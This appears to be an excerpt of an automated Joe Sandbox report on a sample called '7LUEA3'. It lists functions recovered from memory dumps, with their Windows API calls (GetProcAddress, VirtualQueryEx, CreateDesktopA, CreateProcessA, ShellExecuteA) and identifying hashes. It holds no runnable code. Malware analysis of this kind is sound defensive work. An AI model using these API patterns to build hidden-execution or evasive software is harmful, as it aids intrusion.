                                                                                                                                                                                                                                • API String ID: 1646373207-930368515
                                                                                                                                                                                                                                • Opcode ID: 388e721c0927c77e120657df2e7ea03328410ba04d50bcdfb180f3029f5b791b
                                                                                                                                                                                                                                • Instruction ID: f690cc78018bbfedab23eda4affef857003deb5d9f9eee66e1617ec2ef0dce1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 388e721c0927c77e120657df2e7ea03328410ba04d50bcdfb180f3029f5b791b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26E092726086167AA310A6E99C41CAFBBBCDFDE570BA0431ABA2897191D7604D0182B4
                                                                                                                                                                                                                                Function 01557951 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,01558380,0000001C,?,015579C5,0000001C), ref: 01557964
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 01557971
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: VirtualQueryEx$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-930368515
                                                                                                                                                                                                                                • Opcode ID: 39533bba7710dc966a5c0366349fe397a010a97637f92868cc375c4c4826c35e
                                                                                                                                                                                                                                • Instruction ID: 7db395565d6a38ecabb81898c8e12c177092025c7116eab055cf656dd1494e4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39533bba7710dc966a5c0366349fe397a010a97637f92868cc375c4c4826c35e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BE0E6B26052257E6344D6D69C51CABF7BDEEDD5A0750812BFA1897200D6715D0182B4
                                                                                                                                                                                                                                Function 01548EBD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,01549846,00000000,01549859), ref: 01548EC3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 01548ED4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                • Opcode ID: 31bfbd7ffced0ce8cb77b199eed3240f26c21552dd364dd814ecc4046720d1b4
                                                                                                                                                                                                                                • Instruction ID: 7e6365ca6591431e049fe87b3af71a9afe02d1df4896910adfb19ee718431138
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31bfbd7ffced0ce8cb77b199eed3240f26c21552dd364dd814ecc4046720d1b4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2D0A7F46843076FD3309AE9549464735C8BB1030CF02012862304F98DD7F18418571D
                                                                                                                                                                                                                                Function 0154ACC9 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0154AD78
                                                                                                                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0154AD94
                                                                                                                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0154AE0B
                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0154AE34
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 920484758-0
                                                                                                                                                                                                                                • Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                                                                                                                                                                                                                • Instruction ID: 16260575dee5e8b872bd21fda2127906f7eb3d37993690a31edc7f5b5a643fd7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E411175A4161E9FCBA2DF58CC90BC9B3BDBF58218F0045D5E64AAB212D630AF808F50
                                                                                                                                                                                                                                Function 015477D5 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 015477F1
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 01547815
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 01547830
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 015478D4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                                                                                                                • Opcode ID: 7516383afd429c6257b1849a4dbd234218e67e5a2e6437e49bbee05163150df4
                                                                                                                                                                                                                                • Instruction ID: 8cabbd9ab7837cb9c58d90d269a63a50e0ae6e79da932c17f5e08fe8e43bf319
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7516383afd429c6257b1849a4dbd234218e67e5a2e6437e49bbee05163150df4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0241F874A0026A9FDB61DB68C884BDDB7F9BB59308F0440E6A608EB250D7709F88CF51
                                                                                                                                                                                                                                Function 015477D3 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 015477F1
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 01547815
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 01547830
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 015478D4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                                                                                                                • Opcode ID: 6c38fc25b165cdae8babe9a7375fea2725a26f3d1236ce22201a0d59c0ca6cb4
                                                                                                                                                                                                                                • Instruction ID: 704cb99f2fc45a15b092e7ea3e838e09fa23d44282eaaa9eda520f3fda5d1fe6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c38fc25b165cdae8babe9a7375fea2725a26f3d1236ce22201a0d59c0ca6cb4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC41FA74A0026A9FDB61DB68CC84BDDB7F9BB59308F1440E6A608EB250D7709F88CF51
                                                                                                                                                                                                                                Function 015488ED Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 015489E7
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32 ref: 01548917
                                                                                                                                                                                                                                  • Part of subcall function 01548875: GetCPInfo.KERNEL32(00000000,?), ref: 0154888E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1505017576-0
                                                                                                                                                                                                                                • Opcode ID: ce34ec7b128aaacd70c97a60227eb637b7da59df7918aeab204fa11c9dbe37f3
                                                                                                                                                                                                                                • Instruction ID: 12b7602634aad29a38498761cd9b53fd06c76a86a221dd85e641f05f77c3d711
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce34ec7b128aaacd70c97a60227eb637b7da59df7918aeab204fa11c9dbe37f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F3189329043168FE720DBE9E8207AA3BEDBB5235CF444052D9958F3C5DFB4444CA362
                                                                                                                                                                                                                                Function 0153E96B Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(0155C445), ref: 0153E984
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0155C445), ref: 0153E997
                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0153EA35), ref: 0153E9C1
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0155C445), ref: 0153EA2F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 730355536-0
                                                                                                                                                                                                                                • Opcode ID: 10429b316824e741d4afa11b0a47aa5c41ee39091db5300ba1f95047fafb99d0
                                                                                                                                                                                                                                • Instruction ID: 9798999561f3a1c5cbebf6bf1c29ec9992f90d99eb121485adcbd3dc6ed873ff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10429b316824e741d4afa11b0a47aa5c41ee39091db5300ba1f95047fafb99d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D119030604391EFEB55EF99D867A787FE9FBC5301F1140AAE5508F384C6B44901DB11
                                                                                                                                                                                                                                Function 0153E96D Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(0155C445), ref: 0153E984
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0155C445), ref: 0153E997
                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0153EA35), ref: 0153E9C1
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0155C445), ref: 0153EA2F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 730355536-0
                                                                                                                                                                                                                                • Opcode ID: c7d4acb87f5e9af92f53590872ed2e8cb83391bce751d40d15845a65514b100e
                                                                                                                                                                                                                                • Instruction ID: 4d71fbe29630a1df9719403512ce44350413355d02aff8dd51afc2431a48e002
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7d4acb87f5e9af92f53590872ed2e8cb83391bce751d40d15845a65514b100e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F11BF30604392EFEB55EF99E867E687FE9FBC9302F1180AAE5508F384C6B44901DB11
                                                                                                                                                                                                                                Function 01544879 Relevance: 6.0, APIs: 4, Instructions: 43timefileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(?,?), ref: 0154488A
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 01544893
                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 015448A9
                                                                                                                                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 015448B8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2103556486-0
                                                                                                                                                                                                                                • Opcode ID: d20eb782b51232e6883d69b09f6ad95da98c1e944ffd2f844754ed92a9fcc6c8
                                                                                                                                                                                                                                • Instruction ID: 93f471490b47b46dab713dd7d93a5ff2b46c0b6bd1d14348e14af79a6cf48710
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d20eb782b51232e6883d69b09f6ad95da98c1e944ffd2f844754ed92a9fcc6c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A0136B2600516AFDB45DFA8D8C1D8773ECBF5835470485A2ED15DF24AE630E954CBB0
                                                                                                                                                                                                                                Function 01545FE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,015460BF), ref: 01546067
                                                                                                                                                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,015460BF), ref: 0154606D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                                • String ID: yyyy
                                                                                                                                                                                                                                • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                • Opcode ID: 00a1272b2ad25695ae23ecdb51f7facd35526bdacea41f010326a208153fe315
                                                                                                                                                                                                                                • Instruction ID: 44eb2360856724483fb1645bb615220bab38a8a76e15fc6e6942f719196990f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a1272b2ad25695ae23ecdb51f7facd35526bdacea41f010326a208153fe315
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921717861011A9FDB11EFA8C881BEE73B8FF59304F504065F909DB750EA309E44C761
                                                                                                                                                                                                                                Function 015566FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000), ref: 01556774
                                                                                                                                                                                                                                  • Part of subcall function 015564D9: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 015565A3
                                                                                                                                                                                                                                  • Part of subcall function 015564D9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 015565E4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Create$DesktopExecuteProcessShell
                                                                                                                                                                                                                                • String ID: .exe$OPEN
                                                                                                                                                                                                                                • API String ID: 1246678638-879745837
                                                                                                                                                                                                                                • Opcode ID: 1540111b95b2c7f7ab4516b7119d6bc48f0287fe09968222f8b12e57864d02ce
                                                                                                                                                                                                                                • Instruction ID: 9879865ca7332506ab2169ff41cabd76dee6099f6084d74b50fc0f18e99bf63f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1540111b95b2c7f7ab4516b7119d6bc48f0287fe09968222f8b12e57864d02ce
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701F1343047067BD790AABA8CE1F1E72ECFBD9B10F60447AB905EF681E9B0AD004164
                                                                                                                                                                                                                                Function 09C70408 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000003.1628598878.0000000009C3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 09C3C000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_3_9c3c000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: -$-$.$e
                                                                                                                                                                                                                                • API String ID: 0-1205406789
                                                                                                                                                                                                                                • Opcode ID: eca515311dcb8465c553edada03c118ebdd896a565b04f108fb060c45d650bab
                                                                                                                                                                                                                                • Instruction ID: 8f026ffa3ca269faedf5343ee493acb73b0bedad3ad7da8939758134a0d65944
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eca515311dcb8465c553edada03c118ebdd896a565b04f108fb060c45d650bab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51514971C09B848EC34BDF39E06533AFB906F923C0F00CB5EF88666292E77482598716